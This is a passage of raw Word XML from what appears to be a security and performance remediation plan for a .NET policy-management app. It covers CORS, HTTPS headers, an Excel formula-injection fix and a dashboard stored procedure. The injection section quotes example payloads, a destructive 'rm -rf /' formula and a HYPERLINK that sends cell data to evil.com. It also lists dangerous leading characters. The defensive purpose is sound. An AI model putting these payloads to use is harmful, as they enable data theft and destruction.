          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">              .AllowCredentials()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">              .SetPreflightMaxAge(TimeSpan.FromMinutes(10)));</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">});</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Apply based on environment:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">if (app.Environment.IsDevelopment())</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    app.UseCors("DevelopmentCors");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">else</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    app.UseCors("ProductionCors");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec1-4" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">1.4  HTTPS Enforcement &amp; Security Headers</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Implementation — Program.cs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">// Add HTTPS redirect and HSTS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">app.UseHttpsRedirection();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">app.UseHsts();</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Add security headers middleware</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">app.Use(async (context, next) =&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    context.Response.Headers.Add("X-Content-Type-Options", "nosniff");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    context.Response.Headers.Add("X-Frame-Options", "DENY");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    context.Response.Headers.Add("X-XSS-Protection", "1; mode=block");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    context.Response.Headers.Add("Referrer-Policy", "strict-origin-when-cross-origin");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    context.Response.Headers.Add(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        "Content-Security-Policy",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    await next();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec1-5" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">1.5  Excel Input Sanitization (Formula Injection Fix)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The Excel import in UploadPoliciesFromExcelAsync reads cell values directly without sanitization. A malicious Excel file containing formulas like =SYSTEM("rm -rf /") or =HYPERLINK("http://evil.com/steal?data="&amp;A1) can execute when the file is opened in Excel by an admin.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Implementation — Add to Services.cs UploadPoliciesFromExcelAsync</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">private static string SanitizeCellValue(string? rawValue)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (string.IsNullOrWhiteSpace(rawValue)) return string.Empty;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    var trimmed = rawValue.Trim();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    // Strip formula injection characters at the start of the cell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    var dangerousStarts = new[] { "=", "+", "-", "@", "\t", "\r" };</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    foreach (var prefix in dangerousStarts)</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if (trimmed.StartsWith(prefix))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            return "'" + trimmed;  // Prefix with apostrophe to neutralize</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return trimmed;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">}</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Apply in the row parsing loop — replace GetVal() calls:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">string GetVal(int idx) =&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    (idx &gt;= 0 &amp;&amp; idx &lt; dataTable.Columns.Count)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        ? SanitizeCellValue(row[idx]?.ToString())</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        : string.Empty;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec2" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E1B4B"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Section 2 — Performance Optimizations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">These changes address identified bottlenecks in both backend query patterns and frontend rendering. Performance optimizations are targeted for Sprint 2 (Weeks 3–4).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec2-1" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1  Dashboard Stats — Eliminate N+1 Queries</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DashboardService.GetStatsAsync makes 6+ sequential database calls: GetCurrentMonthBudget, GetNextMonthBudget, GetCurrentFYBudget, GetCurrentFYIncome, GetNextYearForecast, and GetFullFYForecastList — each doing a full policy table scan. On a portfolio with 500+ policies, this causes 400–800ms response times.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">New Stored Procedure — sp_GetDashboardStats</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE PROCEDURE sp_GetDashboardStats</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    @MemberNames NVARCHAR(MAX),   -- Comma-separated or JSON array</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    @FYStart     DATE,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    @FYEnd       DATE,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    @NextFYStart DATE,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
